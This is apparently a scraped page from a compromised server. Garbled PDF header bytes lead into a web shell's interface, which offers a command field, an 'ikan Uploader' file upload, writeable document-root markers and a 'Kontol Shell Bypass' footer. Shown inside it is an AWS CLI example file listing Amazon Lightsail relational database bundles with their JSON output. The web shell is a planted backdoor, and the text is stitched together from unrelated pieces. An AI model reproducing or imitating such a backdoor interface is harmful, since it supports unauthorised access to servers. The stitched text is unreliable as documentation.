%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/lightsail/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/lightsail/get-relational-database-bundles.rst
**To get the bundles for new relational databases**

The following ``get-relational-database-bundles`` example displays details about all of the available relational database bundles that can be used to create new relational databases in Amazon Lightsail. ::

    aws lightsail get-relational-database-bundles

Output::

    {
        "bundles": [
            {
                "bundleId": "micro_1_0",
                "name": "Micro",
                "price": 15.0,
                "ramSizeInGb": 1.0,
                "diskSizeInGb": 40,
                "transferPerMonthInGb": 100,
                "cpuCount": 1,
                "isEncrypted": false,
                "isActive": true
            },
            {
                "bundleId": "micro_ha_1_0",
                "name": "Micro with High Availability",
                "price": 30.0,
                "ramSizeInGb": 1.0,
                "diskSizeInGb": 40,
                "transferPerMonthInGb": 100,
                "cpuCount": 1,
                "isEncrypted": false,
                "isActive": true
            },
            {
                "bundleId": "small_1_0",
                "name": "Small",
                "price": 30.0,
                "ramSizeInGb": 2.0,
                "diskSizeInGb": 80,
                "transferPerMonthInGb": 100,
                "cpuCount": 1,
                "isEncrypted": true,
                "isActive": true
            },
            {
                "bundleId": "small_ha_1_0",
                "name": "Small with High Availability",
                "price": 60.0,
                "ramSizeInGb": 2.0,
                "diskSizeInGb": 80,
                "transferPerMonthInGb": 100,
                "cpuCount": 1,
                "isEncrypted": true,
                "isActive": true
            },
            {
                "bundleId": "medium_1_0",
                "name": "Medium",
                "price": 60.0,
                "ramSizeInGb": 4.0,
                "diskSizeInGb": 120,
                "transferPerMonthInGb": 100,
                "cpuCount": 2,
                "isEncrypted": true,
                "isActive": true
            },
            {
                "bundleId": "medium_ha_1_0",
                "name": "Medium with High Availability",
                "price": 120.0,
                "ramSizeInGb": 4.0,
                "diskSizeInGb": 120,
                "transferPerMonthInGb": 100,
                "cpuCount": 2,
                "isEncrypted": true,
                "isActive": true
            },
            {
                "bundleId": "large_1_0",
                "name": "Large",
                "price": 115.0,
                "ramSizeInGb": 8.0,
                "diskSizeInGb": 240,
                "transferPerMonthInGb": 200,
                "cpuCount": 2,
                "isEncrypted": true,
                "isActive": true
            },
            {
                "bundleId": "large_ha_1_0",
                "name": "Large with High Availability",
                "price": 230.0,
                "ramSizeInGb": 8.0,
                "diskSizeInGb": 240,
                "transferPerMonthInGb": 200,
                "cpuCount": 2,
                "isEncrypted": true,
                "isActive": true
            }
        ]
    }

Kontol Shell Bypass